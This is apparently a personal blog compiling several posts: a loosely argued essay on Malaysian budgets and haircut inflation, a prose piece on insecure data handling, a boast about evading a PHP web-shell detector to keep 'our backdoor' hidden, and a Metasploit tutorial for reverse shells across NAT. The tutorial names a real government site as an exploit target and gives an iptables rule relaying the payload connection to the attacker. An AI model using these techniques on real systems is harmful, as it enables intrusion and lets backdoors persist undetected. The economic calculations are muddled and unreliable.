Budget Gunting Rambut

Budget,bonus,gula,handphone,bantuan,miskin,billion,trillion,gazilion,pendidikan percuma blax3, minyak subsidi blax3, etcx3

What do u get when u compare BN budget and PR Budget?
Answer: It's the same regardless which road u choose. Just  +-


From the PPP of our GDP based on IndexMundi
http://www.indexmundi.com/malaysia/gdp_(purchasing_power_parity).html

The hidden law in economy is that, everything is computable if u eliminate unnecessary human feelings toward any party . When you can compute which means there's a law that can be follow.

We've seen the rise of purchasing power parity grows steady approximation 5% increase per year. There's a bit slop on 99-2000 due to dat depression period but else we see a rate of growth every year.  Now some people say it's thanks to BN, DR.M and blax3 our PPP increased .
But from law of exponentiation in economics

And for the doubling time where rate of growth  goes 100% from the initial sampling

And we can see it's true in 14 years  the rate of growth goes beyond 100%

What does this statistic tell us?  We spend a lot on doing regular things . Forget unhealthy stuff like (radical energy from electronic devices and high calories food)  take Gunting rambut for example.

An average Joe (decent malaysian bukan rambut kalerx2 or rambut panjang macam Kage) spend an average 15 minutes  at a barber shop. A normal hair grow 1/2 inch per month so for boys , it means 2 month cut hair you continue to cut hair like u did in school, At 30. you should experience at least 138 hair cuts.(Starting from age of 7). Nerveless the price of cutting hair increase exponentially with the doubling time.

Current gunting rambut price average in KL is 10..

Time spending at barber shop: 15 minutes constant .

Do take not unless some dystopia event is triggered. By the time anak Aalim umur 7 tahun . The price for to cut his son hair is roughly rm15 ringgit. and masuk from 2 straight rm30. bwahahha

Sources: indexmundi and some youtube video. Don't care bout crappy grammars aku bukan mat salleh 

There is no security.

The Scenario

Alice : Hi I would like to make booking reservation at your resort today.

Manager: Sure but u need to send us a copy of front/back of your cc card to telly it.

Alice: Now way!! dat's Insecure.

Manager: Well you could use our online booking system. it's encrypted with 2048-bit blax333...

Alice: Cool, thanks man!!

Manager: No Problem , be sure not to do give the details in a public wifi and only use trusted "Network when u use our system, Can't have people snoop on the traffic eyt. "..

Taking a classical approach on crypto.. When Alice and Manager want to exchange sensiive information...

what do they do? Use SSL or any other "state of the art " of cryptic stuff into a Z transform.. So to simplify a flow of processs. We say Alice view the data in an unencrypted form same as Manager .  From process flow point of view.

So in the Genesis of Covert Channel , In the beginning there is no security, and in the end there is no security.  Suppose let us expend the diagram catering outside process flow.

Where Reality Domain is consisting physical interaction+ environment that Alice/ Manager  encounter with either living beings or non living beings . Why Logical Domain is the list of interaction that the application used/encounter  to view the insecure form of the data..

Suppose Alice is an owner of Credit/Debit Card,, In some way or another the Reality Domain that Alice may encounter is either

- Cashier

- Receptionist 

- Friends

- Family

While in Logical Domain can be narrowed down into 3  entity;

- Web Browser

- Email

- PDF Output or Postcript Dump for Printing/Archive purposes)

For Manager,  the Reality Domain they will encountered.

- Finance

- Clerk

- Auditor

- External booking Information

While in Logical Domain can be narrowed down into 3  entity;

- Software viewing customer data, (Probably Excel or PDF Form)

- Email

- PDF Output or Postcript Dump for Printing/Archive purposes)

Notice that any interaction in the reality domain and logical domain doesn`t have any form of security at all.

What's the implication of this information? Suppose a Manager says "we received this booking from this Alice, here's her detail please process and proceed with the payment"  to Finance. The instruction and information will be passed around in an insecure domain form (regardless via electronics means such as email or verbal )..

We spend tremendous amount of money to secure the process flow with multitude complience that we often forgot to realize what happen in the "event before the flow" and "event after the flow" ..

• Have we pay attention on security in interaction in both domains?
• What's keeping our data safe from any entity for each domains?
• Can an entity hop/mimicking other entity across domains?

In the lore of malware we know that a malware can hijack/process/threads of other application on certain circumstances(token privilege,RemoteThreadCreate() APi etcx3).

In the lore of scam-ware, we know a person can impersonate other people and retrive data as long as we have the correct personality.

In the lore of human brains, 99% of us cannnot cannot decrypt  DES with a "constant key" in mere seconds thus resulting that data need to be pass to another human in it's original forms (numbers,name,passwords).

Conclusion:

The reality of security is broken if it can be view in an insecure forms..

We are living in an insecured enviroment over a thin line of trust. 

Bypass PHP ShellDetector: Poorman Style

One thing i hate the most is people finding our backdoor. So from xanda`s blog I found out there's a project called  phpshelldetect to detect malises phpcode.

So  Xanda wrote a good tutorial on how to bypass it  web xanda 

Since it's a signature based which means as long as we can craft 101 type of signature evasive technique.. It will be bypassed.

Signature based are bad and inefficent but fast enough to eliminate 99% of the population of the netizen.

So how hard is it to bypass the detector? Not dat hard at all and no obfuscation required.

And it works like a charm...

Lalala

Art of Pentesting: NAT to NAT attack with metasploit

As a follower of the "only way to exploit is Metasploit" we often encounter situation where most servers are behind NAT . In order for the exploitable server to be successful connected back to the attacker machine in a typical pentest workaround is by forcing  the exploitable server to make a reverse_tcp payload back to the attacker machine.

However this technique require several weakness:

- The attacker need to have an ext.PI

- The attacker would be in trouble if he is also in a NAT  enviroment..

- The attacker Network have limited open ports.

A fakap situation

Solving the issue can be done in two ways..

1. Thinkering with your company policy to allowed port forwarding to the internal IP

2. Using an external IP interfacing box as a trampoline point to our internal network..

We used an external Box as our trampoline point. You could install metasploit on the server but that may violated blax3 policy plus consume a lot resources.

P.O.C of attack

Suppose we found a CFM FCKeditor bugs  on chaah.gov.my , we can easily deploy the exploit as it is.

But the tricky part is the payload settings. On my Settings i have this type of connection.

My Setup.

1. Setup VPN or Poor Man VPN on your external box

2. Redir traffic for one port on the external box to your own internal VPN IP:port
3. Exploit


Setting up the metasploit payload..

On your external Box u can use iptables to redirect traffic

 iptables -t nat -A PREROUTING -p tcp --dport 6767-j DNAT --to-destination 192.168.6.14:6767 (Owned interface VPN IP)

Back to metasploit here is the jewel crown.. we set  ReverseListenerBinAddress to our own VPN IP.

.... And the ritual begin